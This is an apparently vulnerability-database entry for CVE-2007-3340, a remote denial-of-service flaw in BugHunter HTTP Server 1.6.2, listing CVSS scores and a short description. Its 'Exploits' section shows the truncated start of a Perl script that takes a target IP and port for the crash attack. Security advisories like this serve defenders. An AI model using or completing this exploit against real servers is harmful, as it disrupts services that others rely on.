7.8
CVSSv2

CVE-2007-3340

Published: 21/06/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

BugHunter HTTP SERVER (httpsv.exe) 1.6.2 allows remote malicious users to cause a denial of service (application crash) via a large number of requests for nonexistent pages.

Vulnerable Product Search on Vulmon Subscribe to Product

bughunter http server 1.6.2

Exploits

#!/usr/bin/perl #GetOpt STD module use IO::Socket; use Getopt::Std; getopts(":i:p:",\%args); if(defined $args{i}){ $ip = $args{i}; } if(defined $args{p}){ $port = $args{p}; } if(!defined $args{i} or !defined $args{p}){ print "-----------------------------------------------------\n"; print "HTTP SERVER (httpsv162) 404 Denial of Services\n"; print ...